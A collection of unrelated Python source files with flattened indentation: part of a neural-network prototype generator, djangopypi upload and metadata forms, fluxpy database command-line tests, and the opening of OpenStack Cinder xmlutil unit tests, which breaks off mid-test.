for i in range(feat_raw_dim+1, (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), feat_raw_dim + o.pitch_dim):
vector += '%d:1:%d ' % (i, i + o.pitch_dim - 1)
print '<Copy> <InputDim> %d <OutputDim> %d <BuildVector> %s </BuildVector> ' % \
((feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), vector)
print '<ParallelComponent> <InputDim> %d <OutputDim> %d <NestedNnetProto> %s %s </NestedNnetProto>' % \
((feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), o.num_pitch_neurons + o.num_filters2*num_patch2, '%s/nnet.proto.convolution' % o.dirct, '%s/nnet.proto.pitch' % o.dirct)
num_convolution_output = o.num_pitch_neurons + o.num_filters2*num_patch2
else: # no pitch
print convolution_proto
num_convolution_output = o.num_filters2*num_patch2
# Only last layer (logistic regression)
if num_hid_layers == 0:
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
(num_convolution_output, num_leaves, 0.0, 0.0, (o.param_stddev_factor * Glorot(feat_dim, num_leaves)))
if o.with_softmax:
print "<Softmax> <InputDim> %d <OutputDim> %d" % (num_leaves, num_leaves)
print "</NnetProto>"
# We are done!
sys.exit(0)
# Assuming we have >0 hidden layers
assert(num_hid_layers > 0)
# First AffineTranform
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
(num_convolution_output, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
(o.param_stddev_factor * Glorot(feat_dim, num_hid_neurons) * \
(math.sqrt(1.0/12.0) if o.smaller_input_weights else 1.0)))
# stddev(U[0,1]) = sqrt(1/12); reducing stddev of weights,
# the dynamic range of input data is larger than of a Sigmoid.
print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Internal AffineTransforms
for i in range(num_hid_layers-1):
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
(num_hid_neurons, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
(o.param_stddev_factor * Glorot(num_hid_neurons, num_hid_neurons)))
print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Optionaly add bottleneck
if o.bottleneck_dim != 0:
assert(o.bottleneck_dim > 0)
# 25% smaller stddev -> small bottleneck range, 10x smaller learning rate
print "<LinearTransform> <InputDim> %d <OutputDim> %d <ParamStddev> %f <LearnRateCoef> %f" % \
(num_hid_neurons, o.bottleneck_dim, \
(o.param_stddev_factor * Glorot(num_hid_neurons, o.bottleneck_dim) * 0.75 ), 0.1)
# 25% smaller stddev -> smaller gradient in prev. layer, 10x smaller learning rate for weigts & biases
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f <LearnRateCoef> %f <BiasLearnRateCoef> %f" % \
(o.bottleneck_dim, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
(o.param_stddev_factor * Glorot(o.bottleneck_dim, num_hid_neurons) * 0.75 ), 0.1, 0.1)
print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Last AffineTransform (10x smaller learning rate on bias)
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f <LearnRateCoef> %f <BiasLearnRateCoef> %f" % \
(num_hid_neurons, num_leaves, 0.0, 0.0, \
(o.param_stddev_factor * Glorot(num_hid_neurons, num_leaves)), 1.0, 0.1)
# Optionaly append softmax
if o.with_softmax:
print "<Softmax> <InputDim> %d <OutputDim> %d" % (num_leaves, num_leaves)
# End the prototype
print "</NnetProto>"
# We are done!
sys.exit(0)
| |
from os.path import basename
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from djangopypi.settings import settings
from djangopypi.models import Package, Classifier, Release, Distribution
class SimplePackageSearchForm(forms.Form):
query = forms.CharField(max_length=255)
class PackageForm(forms.ModelForm):
class Meta:
model = Package
exclude = ['name']
class DistributionUploadForm(forms.ModelForm):
class Meta:
model = Distribution
fields = ('content','comment','filetype','pyversion',)
def clean_content(self):
content = self.cleaned_data['content']
storage = self.instance.content.storage
field = self.instance.content.field
name = field.generate_filename(instance=self.instance,
filename=content.name)
if not storage.exists(name):
print '%s does not exist' % (name,)
return content
if settings.DJANGOPYPI_ALLOW_VERSION_OVERWRITE:
raise forms.ValidationError('Version overwrite is not yet handled')
raise forms.ValidationError('That distribution already exists, please '
'delete it first before uploading a new '
'version.')
class ReleaseForm(forms.ModelForm):
metadata_version = forms.CharField(widget=forms.Select(choices=zip(settings.DJANGOPYPI_METADATA_FIELDS.keys(),
settings.DJANGOPYPI_METADATA_FIELDS.keys())))
class Meta:
model = Release
exclude = ['package', 'version', 'package_info']
metadata10licenses = ('Artistic', 'BSD', 'DFSG', 'GNU GPL', 'GNU LGPL',
'MIT', 'Mozilla PL', 'public domain', 'Python',
'Qt', 'PL', 'Zope PL', 'unknown', 'nocommercial', 'nosell',
'nosource', 'shareware', 'other')
class LinesField(forms.CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('widget', forms.Textarea())
super(LinesField, self).__init__(*args, **kwargs)
def to_python(self, value):
return map(lambda s: s.strip(),
super(LinesField, self).to_python(value).split('\n'))
class Metadata10Form(forms.Form):
platform = LinesField(required=False,
help_text=_(u'A comma-separated list of platform '
'specifications, summarizing the '
'operating systems supported by the '
'package.'))
summary = forms.CharField(help_text=_(u'A one-line summary of what the '
'package does.'))
description = forms.CharField(required=False,
widget=forms.Textarea(attrs=dict(rows=40,
columns=40)),
help_text=_(u'A longer description of the '
'package that can run to several '
'paragraphs. If this is in '
'reStructuredText format, it will '
'be rendered nicely on display.'))
keywords = forms.CharField(help_text=_(u'A list of additional keywords to '
'be used to assist searching for the '
'package in a larger catalog'))
home_page = forms.URLField(required=False, verify_exists=True,
help_text=_(u'A string containing the URL for '
'the package\'s home page.'))
author = forms.CharField(required=False,
widget=forms.Textarea(attrs=dict(rows=3,
columns=20)),
help_text=_(u'A string containing at a minimum the '
'author\'s name. Contact information '
'can also be added, separating each '
'line with newlines.'))
author_email = forms.CharField(help_text=_(u'A string containing the '
'author\'s e-mail address. It '
'can contain a name and e-mail '
'address in the legal forms for '
'a RFC-822 \'From:\' header.'))
license = forms.CharField(max_length=32,
help_text=_(u'A string selected from a short list '
'of choices, specifying the license '
'covering the package.'),
widget=forms.Select(choices=(zip(metadata10licenses,
metadata10licenses))))
class Metadata11Form(Metadata10Form):
supported_platform = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'The OS and CPU for which '
'the binary package was '
'compiled.'))
keywords = forms.CharField(required=False,
help_text=_(u'A list of additional keywords to '
'be used to assist searching for the '
'package in a larger catalog'))
download_url = forms.URLField(required=False, verify_exists=True,
help_text=_(u'A string containing the URL for '
'the package\'s home page.'))
license = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'Text indicating the license '
'covering the package where the '
'license is not a selection from the '
'"License" Trove classifiers.'))
classifier = forms.ModelMultipleChoiceField(required=False,
queryset=Classifier.objects.all(),
help_text=_(u'Trove classifiers'))
requires = LinesField(required=False,
help_text=_(u'Each line contains a string describing '
'some other module or package required by '
'this package.'))
provides = LinesField(required=False,
help_text=_(u'Each line contains a string describing '
'a package or module that will be '
'provided by this package once it is '
'installed'))
obsoletes = LinesField(required=False,
help_text=_(u'Each line contains a string describing '
'a package or module that this package '
'renders obsolete, meaning that the two '
'packages should not be installed at the '
'same time'))
class Metadata12Form(Metadata10Form):
supported_platform = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'The OS and CPU for which '
'the binary package was '
'compiled.'))
keywords = forms.CharField(required=False,
help_text=_(u'A list of additional keywords to '
'be used to assist searching for the '
'package in a larger catalog'))
download_url = forms.URLField(required=False,
verify_exists=True,
help_text=_(u'A string containing the URL for '
'the package\'s home page.'))
author_email = forms.CharField(required=False,
help_text=_(u'A string containing the '
'author\'s e-mail address. It '
'can contain a name and e-mail '
'address in the legal forms for '
'a RFC-822 \'From:\' header.'))
maintainer = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'A string containing at a minimum '
'the maintainer\'s name. Contact '
'information can also be added, '
'separating each line with '
'newlines.'))
maintainer_email = forms.CharField(required=False,
help_text=_(u'A string containing the '
'maintainer\'s e-mail address. '
'It can contain a name and '
'e-mail address in the legal '
'forms for a RFC-822 '
'\'From:\' header.'))
license = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'Text indicating the license '
'covering the package where the '
'license is not a selection from the '
'"License" Trove classifiers.'))
classifier = forms.ModelMultipleChoiceField(required=False,
queryset=Classifier.objects.all(),
help_text=_(u'Trove classifiers'))
requires_dist = LinesField(required=False,
help_text=_(u'Each line contains a string '
'describing some other module or '
'package required by this package.'))
provides_dist = LinesField(required=False,
help_text=_(u'Each line contains a string '
'describing a package or module that '
'will be provided by this package '
'once it is installed'))
obsoletes_dist = LinesField(required=False,
help_text=_(u'Each line contains a string '
'describing a package or module that '
'this package renders obsolete, '
'meaning that the two packages '
'should not be installed at the '
'same time'))
requires_python = forms.CharField(required=False,
help_text=_(u'This field specifies the '
'Python version(s) that the '
'distribution is guaranteed '
'to be compatible with.'))
requires_external = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'Each line contains a '
'string describing some '
'dependency in the system '
'that the distribution is '
'to be used.'))
project_url = forms.CharField(required=False, widget=forms.Textarea(),
help_text=_(u'Each line is a string containing '
'a browsable URL for the project '
'and a label for it, separated '
'by a comma: "Bug Tracker, '
'http://bugs.project.com"'))
| |
import ast
import sys
import csv
import datetime
import os
import unittest
import subprocess
import pandas as pd
import numpy as np
import h5py
from pymongo import MongoClient
from fluxpy import __path__ as fluxpy_module_path
from fluxpy import DB
from fluxpy.models import KrigedXCO2Matrix, SpatioTemporalMatrix, XCO2Matrix
from fluxpy.mediators import Grid3DMediator, Grid4DMediator, Unstructured3DMediator, DB
FNULL = open(os.devnull, 'w')
class TestManage(unittest.TestCase):
'''Tests manage.py command line functionality'''
db = MongoClient()[DB]
def load_test_data(self):
# remove any stale sample data and reload
cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
subprocess.call(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
cmd = '''python ../../manage.py load -p casagfed2004.mat -n casa_gfed_load_test -m SpatioTemporalMatrix'''
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
def test_load_command(self):
'''
Tests that command line manage.py load utility properly loads data and
transfers config_file override options to database
'''
# remove any stale test data
cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
# load some sample data, check for expected standard output information
cmd = '''python ../../manage.py load -p casagfed2004.mat -n casa_gfed_load_test -m SpatioTemporalMatrix -o "title=MyData;timestamp=2010-10-10T00:00:00"'''
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('Upload complete!')),1)
# now check metadata to see if it loaded correctly
document = self.db['metadata'].find({'_id': 'casa_gfed_load_test'})
self.assertGreater(document.count(),0)
self.assertEqual(document[0]['title'], 'MyData')
self.assertEqual(document[0]['dates'][0], '2010-10-10T00:00:00')
# now remove
cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
subprocess.call(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
def test_db_tools(self):
'''
commands to test:
# test all iterations of db command:
python manage.py db -l collections
python manage.py db -l collections -x
python manage.py db -l metadata
python manage.py db -l coord_index
python manage.py db -n casa_gfed_2004
python manage.py db -a
'''
self.load_test_data()
# check that the test dataset is listed w/ the appropriate number of records
cmd = 'python ../../manage.py db -l collections -x'
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('casa_gfed_load_test (8 records)')),1)
# check that the metadata table lists the test dataset
cmd = 'python ../../manage.py db -l metadata'
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('casa_gfed_load_test')),1)
# check that the coord_index table lists the test dataset
cmd = 'python ../../manage.py db -l coord_index'
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('casa_gfed_load_test')),1)
# check that the metadata is returned as expected
cmd = 'python ../../manage.py db -n casa_gfed_load_test'
result = ast.literal_eval(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT).replace('\n',''))
meta = self.db['metadata'].find({'_id': 'casa_gfed_load_test'})[0]
self.assertDictEqual(result, meta)
# check that audit utility returns... anything
cmd = 'python ../../manage.py db -a'
result = subprocess.check_output(cmd, shell=True)
self.assertGreater(len(result.split('audit complete')),1)
# now remove
cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
def test_remove_command(self):
'''
Finally, test the 'remove' utility, ensuring collection has been purged from metadata as well
'''
self.load_test_data()
# check that command results indicate successful removal
cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('casa_gfed_load_test" successfully removed')),1)
# check that data was in fact removed
self.assertEqual('casa_gfed_load_test' in self.db.collection_names(), False)
for cname in ['metadata', 'coord_index']:
tmp = [t['_id'] for t in list(self.db[cname].find())]
self.assertEqual('casa_gfed_load_test' in tmp, False)
def test_rename_command(self):
'''Test the rename utility'''
self.load_test_data()
# check that command results indicate successful renaming
cmd = 'python ../../manage.py rename -n casa_gfed_load_test -r fancypants'
result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
self.assertGreater(len(result.split('casa_gfed_load_test" to "fancypants"')),1)
# check that database includes the new name but not the old name
self.assertEqual('casa_gfed_load_test' in self.db.collection_names(), False)
self.assertEqual('fancypants' in self.db.collection_names(), True)
for cname in ['metadata', 'coord_index']:
tmp = [t['_id'] for t in list(self.db[cname].find())]
self.assertEqual('casa_gfed_load_test' in tmp, False)
self.assertEqual('fancypants' in tmp, True)
# now clean up by removing
cmd = 'python ../../manage.py remove -n fancypants'
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
class TestSpatioTemporalMatrixes(unittest.TestCase):
'''Tests for proper handling of inverted CO2 surface fluxes (e.g. CASA GFED output)'''
mediator = Grid4DMediator()
path = os.path.join(fluxpy_module_path[0], 'tests')
@classmethod
def setUpClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test3',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
@classmethod
def tearDownClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test3',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
def test_model_instance(self):
'''Should properly instantiate an SpatioTemporalMatrix model instance'''
flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
timestamp='2004-06-30T00:00:00', var_name='test', span=10800)
self.assertEqual(flux.var_name, 'test')
self.assertEqual(flux.steps, [10800])
self.assertEqual(flux.timestamp, '2004-06-30T00:00:00')
def test_model_var_name_inference(self):
'''Should infer the var_name in an SpatioTemporalMatrix model instance'''
flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'))
self.assertEqual(flux.var_name, 'casa_gfed_2004')
def test_model_describe(self):
'''Should produce metadata for a SpatioTemporalMatrix model instance'''
flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004',span=10800)
df = flux.describe()
self.assertEqual(df['bbox'], (-166.5, 10.5, -50.5, 69.5))
self.assertEqual(df['bboxmd5'], '6f3e33c145010bc74c5ccd3ba772f504')
self.assertEqual(df['dates'], ['2004-06-30T00:00:00', '2004-06-30T21:00:00'])
self.assertEqual(df['gridded'], True)
self.assertEqual(df['grid'], {'units': 'degrees', 'x': 1.0, 'y': 1.0})
self.assertEqual(df['steps'], [10800])
def test_model_extract(self):
'''Should extract a DataFrame in an SpatioTemporalMatrix model instance'''
flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004')
df = flux.extract()
self.assertEqual(df.shape, (2635, 8))
self.assertEqual(str(df.columns[1]), '2004-06-30 03:00:00')
self.assertEqual(df.index.values[1], (-165.5, 61.5))
def test_save_to_db(self):
'''Should successfully save proper data representation to database'''
flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004')
self.mediator.save('test3', flux)
query = self.mediator.client[self.mediator.db_name]['test3'].find({
'_id': datetime.datetime(2004, 6, 30, 0, 0, 0),
})
self.assertEqual(len(query[0]['values']), 2635)
self.assertEqual(query[0]['values'][0], 0.08)
# Test the mediator's summarize() method
summary = self.mediator.summarize('test3')
self.assertEqual(summary.keys(), ['values'])
#print summary['values'].keys()
self.assertEqual(summary['values'].keys(), [
'std', 'max', 'min', 'median', 'mean'
])
class TestXCO2Data(unittest.TestCase):
'''Tests for proper handling of XCO2 retrievals'''
mediator = Unstructured3DMediator()
path = os.path.join(fluxpy_module_path[0], 'tests')
@classmethod
def setUpClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
@classmethod
def tearDownClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
def test_model_instance(self):
'''Should properly instantiate a model instance'''
xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
timestamp='2009-06-15')
self.assertEqual(xco2.var_name, 'XCO2')
self.assertEqual(xco2.timestamp, '2009-06-15')
def test_model_extract(self):
'''Should create proper DataFrame from reading file data'''
xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
timestamp='2009-06-15')
df1 = xco2.extract()
self.assertEqual(df1.shape, (1311, 7))
# Should allow overrides in the extract() method
df2 = xco2.extract(timestamp='2010-01-01')
self.assertEqual(xco2.timestamp, '2010-01-01')
def test_save_to_db(self):
'''Should successfully save proper data representation to database'''
xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
timestamp='2009-06-15')
self.mediator.save('test', xco2)
query = self.mediator.client[self.mediator.db_name]['test'].find({
'timestamp': datetime.datetime(2009, 6, 16, 0, 0, 0),
})
self.assertEqual(query[0]['properties']['value'], 386.79)
class TestKrigedXCO2Data(unittest.TestCase):
'''Tests for proper handling of kriged (gridded) XCO2 data'''
mediator = Grid3DMediator()
path = os.path.join(fluxpy_module_path[0], 'tests')
@classmethod
def setUpClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test2',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
@classmethod
def tearDownClass(cls):
# Clean up: Remove the test collections and references
mediator = Grid3DMediator()
for collection_name in ('test2',):
mediator.client[mediator.db_name].drop_collection(collection_name)
mediator.client[mediator.db_name]['coord_index'].remove({
'_id': collection_name
})
mediator.client[mediator.db_name]['metadata'].remove({
'_id': collection_name
})
def test_model_instance(self):
'''Should properly instantiate a model instance'''
xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
timestamp='2009-06-15')
self.assertEqual(xco2.var_name, 'krigedData')
self.assertEqual(xco2.spans, [518400])
self.assertEqual(xco2.timestamp, '2009-06-15')
def test_model_extract(self):
'''Should create proper DataFrame from reading file data'''
xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
timestamp='2009-06-15')
df1 = xco2.extract()
self.assertEqual(df1.shape, (14210, 9))
# Should allow overrides in the extract() method
df2 = xco2.extract(timestamp='2010-01-01')
self.assertEqual(xco2.timestamp, '2010-01-01')
def test_save_to_db(self):
'''Should successfully save proper data representation to database'''
xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
timestamp='2009-06-15')
# Drop the old collection; it will be recreated when inserting
self.mediator.client[self.mediator.db_name].drop_collection('test2')
self.mediator.client[self.mediator.db_name]['coord_index'].remove({
'_id': 'test2'
})
self.mediator.client[self.mediator.db_name]['metadata'].remove({
'_id': 'test2'
})
self.mediator.save('test2', xco2)
query = self.mediator.client[self.mediator.db_name]['test2'].find({
'_id': datetime.datetime(2009, 6, 15, 0, 0, 0),
})
self.assertEqual(query[0]['_span'], 518400)
self.assertEqual(len(query[0]['values']), 14210)
# Test the mediator's summarize() method
summary = self.mediator.summarize('test2')
self.maxDiff = None # Show the full diff
self.assertEqual(summary.keys(), ['errors', 'values'])
self.assertEqual(summary['values'].keys(), [
'std', 'max', 'min', 'median', 'mean'
])
# class TestHDF5(unittest.TestCase):
# '''Tests HDF5 fluency and conversion utilities'''
#
# path = '/usr/local/project/flux-python-api/fluxpy/tests/'
# filename = 'temp.h5'
#
# def test_bulk_hdf5_to_csv(self):
# '''Should bulk convert HDF5 files to CSV files'''
# hdf_path = os.path.join(self.path, self.filename)
# csv_path = os.path.join(self.path, self.filename.split('.')[0] + '.csv')
#
# # Delete file; create a new one
# try:
# os.remove(hdf_path)
#
# except OSError:
# pass
#
# store = h5py.File(os.path.join(self.path, self.filename), 'a')
#
# # Populate the token HDF file
# data = store.create_dataset('temp', np.array([10, 10]), dtype='i')
# data[:,:] = np.arange(10)
# store.close()
#
# bulk_hdf5_to_csv(self.path, 'temp', regex='^.*\.h5')
#
# with open(csv_path) as stream:
# reader = csv.reader(stream)
# for line in reader:
# # Skip header and skip the index (first item in each row)
# if reader.line_num != 1:
# self.assertEqual(line[1:], map(str, range(10)))
#
# # Clean up
# os.remove(hdf_path)
# os.remove(csv_path)
if __name__ == '__main__':
unittest.main()
| |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from cinder.api import xmlutil
from cinder import test
class SelectorTest(test.TestCase):
obj_for_test = {'test': {'name': 'test',
'values': [1, 2, 3],
'attrs': {'foo': 1,
'bar': 2,
'baz': 3, }, }, }
def test_empty_selector(self):
sel = xmlutil.Selector()
self.assertEqual(0, len(sel.chain))
self.assertEqual(self.obj_for_test, sel(self.obj_for_test))
def test_dict_selector(self):
sel = xmlutil.Selector('test')
self.assertEqual(1, len(sel.chain))
self.assertEqual('test', sel.chain[0])
self.assertEqual(self.obj_for_test['test'],
sel(self.obj_for_test))
def test_datum_selector(self):
sel = xmlutil.Selector('test', 'name')
self.assertEqual(2, len(sel.chain))
self.assertEqual('test', sel.chain[0])
self.assertEqual('name', sel.chain[1])
self.assertEqual('test', sel(self.obj_for_test))
def test_list_selector(self):
sel = xmlutil.Selector('test', 'values', 0)
self.assertEqual(3, len(sel.chain))
self.assertEqual('test', sel.chain[0])
self.assertEqual('values', sel.chain[1])
self.assertEqual(0, sel.chain[2])
self.assertEqual(1, sel(self.obj_for_test))
def test_items_selector(self):
sel = xmlutil.Selector('test', 'attrs', xmlutil.get_items)
self.assertEqual(3, len(sel.chain))
self.assertEqual(xmlutil.get_items, sel.chain[2])
for key, val in sel(self.obj_for_test):
self.assertEqual(self.obj_for_test['test']['attrs'][key], val)
def test_missing_key_selector(self):
sel = xmlutil.Selector('test2', 'attrs')
self.assertIsNone(sel(self.obj_for_test))
self.assertRaises(KeyError, sel, self.obj_for_test, True)
def test_constant_selector(self):
sel = xmlutil.ConstantSelector('Foobar')
self.assertEqual('Foobar', sel.value)
self.assertEqual('Foobar', sel(self.obj_for_test))
class TemplateElementTest(test.TestCase):
def test_element_initial_attributes(self):
# Create a template element with some attributes
elem = xmlutil.TemplateElement('test', attrib=dict(a=1, b=2, c=3),
c=4, d=5, e=6)
# Verify all the attributes are as expected
expected = dict(a=1, b=2, c=4, d=5, e=6)
for k, v in expected.items():
self.assertEqual(v, elem.attrib[k].chain[0])
def test_element_get_attributes(self):
expected = dict(a=1, b=2, c=3)
# Create a template element with some attributes
elem = xmlutil.TemplateElement('test', attrib=expected)
# Verify that get() retrieves the attributes
for k, v in expected.items():
self.assertEqual(v, elem.get(k).chain[0])
def test_element_set_attributes(self):
attrs = dict(a=None, b='foo', c=xmlutil.Selector('foo', 'bar'))
# Create a bare template element with no attributes
elem = xmlutil.TemplateElement('test')
# Set the attribute values
for k, v in attrs.items():
elem.set(k, v)
# Now verify what got set
self.assertEqual(1, len(elem.attrib['a'].chain))
self.assertEqual('a', elem.attrib['a'].chain[0])
self.assertEqual(1, len(elem.attrib['b'].chain))
self.assertEqual('foo', elem.attrib['b'].chain[0])
self.assertEqual(attrs['c'], elem.attrib['c'])
def test_element_attribute_keys(self):
attrs = dict(a=1, b=2, c=3, d=4)
expected = set(attrs.keys())
# Create a template element with some attributes
elem = xmlutil.TemplateElement('test', attrib=attrs)
# Now verify keys
self.assertEqual(expected, set(elem.keys()))
def test_element_attribute_items(self):
expected = dict(a=xmlutil.Selector(1),
b=xmlutil.Selector(2),
c=xmlutil.Selector(3))
keys = set(expected.keys())
# Create a template element with some attributes
elem = xmlutil.TemplateElement('test', attrib=expected)
# Now verify items
for k, v in elem.items():
self.assertEqual(expected[k], v)
keys.remove(k)
# Did we visit all keys?
self.assertEqual(0, len(keys))
def test_element_selector_none(self):
# Create a template element with no selector
elem = xmlutil.TemplateElement('test')
self.assertEqual(0, len(elem.selector.chain))
def test_element_selector_string(self):
# Create a template element with a string selector
elem = xmlutil.TemplateElement('test', selector='test')
self.assertEqual(1, len(elem.selector.chain))
self.assertEqual('test', elem.selector.chain[0])
def test_element_selector(self):
sel = xmlutil.Selector('a', 'b')
# Create a template element with an explicit selector
elem = xmlutil.TemplateElement('test', selector=sel)
self.assertEqual(sel, elem.selector)
def test_element_subselector_none(self):
# Create a template element with no subselector
elem = xmlutil.TemplateElement('test')
self.assertIsNone(elem.subselector)
def test_element_subselector_string(self):
# Create a template element with a string subselector
elem = xmlutil.TemplateElement('test', subselector='test')
self.assertEqual(1, len(elem.subselector.chain))
self.assertEqual('test', elem.subselector.chain[0])
def test_element_subselector(self):
sel = xmlutil.Selector('a', 'b')
# Create a template element with an explicit subselector
elem = xmlutil.TemplateElement('test', subselector=sel)
self.assertEqual(sel, elem.subselector)
def test_element_append_child(self):
# Create an element
elem = xmlutil.TemplateElement('test')
# Make sure the element starts off empty
self.assertEqual(0, len(elem))
# Create a child element
child = xmlutil.TemplateElement('child')
# Append the child to the parent
elem.append(child)
# Verify that the child was added
self.assertEqual(1, len(elem))
self.assertEqual(child, elem[0])
self.assertIn('child', elem)
self.assertEqual(child, elem['child'])
# Ensure that multiple children of the same name are rejected
child2 = xmlutil.TemplateElement('child')
self.assertRaises(KeyError, elem.append, child2)
def test_element_extend_children(self):
# Create an element
elem = xmlutil.TemplateElement('test')
# Make sure the element starts off empty
self.assertEqual(0, len(elem))
# Create a few children
children = [xmlutil.TemplateElement('child1'),
xmlutil.TemplateElement('child2'),
xmlutil.TemplateElement('child3'), ]
# Extend the parent by those children
elem.extend(children)
# Verify that the children were added
self.assertEqual(3, len(elem))
for idx in range(len(elem)):
self.assertEqual(children[idx], elem[idx])
self.assertIn(children[idx].tag, elem)
self.assertEqual(children[idx], elem[children[idx].tag])
# Ensure that multiple children of the same name are rejected
children2 = [xmlutil.TemplateElement('child4'),
xmlutil.TemplateElement('child1'), ]
self.assertRaises(KeyError, elem.extend, children2)
# Also ensure that child4 was not added
self.assertEqual(3, len(elem))
self.assertEqual('child3', elem[-1].tag)
def test_element_insert_child(self):
# Create an element
elem = xmlutil.TemplateElement('test')
# Make sure the element starts off empty
self.assertEqual(0, len(elem))
# Create a few children
children = [xmlutil.TemplateElement('child1'),
xmlutil.TemplateElement('child2'),
xmlutil.TemplateElement('child3'), ]
# Extend the parent by those children
elem.extend(children)
# Create a child to insert
child = xmlutil.TemplateElement('child4')
# Insert it
elem.insert(1, child)
# Ensure the child was inserted in the right place
self.assertEqual(4, len(elem))
children.insert(1, child)
for idx in range(len(elem)):
self.assertEqual(children[idx], elem[idx])
self.assertIn(children[idx].tag, elem)
self.assertEqual(children[idx], elem[children[idx].tag])
# Ensure that multiple children of the same name are rejected
child2 = xmlutil.TemplateElement('child2')
self.assertRaises(KeyError, elem.insert, 2, child2)
def test_element_remove_child(self):
# Create an element
elem = xmlutil.TemplateElement('test')
# Make sure the element starts off empty
self.assertEqual(0, len(elem))
# Create a few children
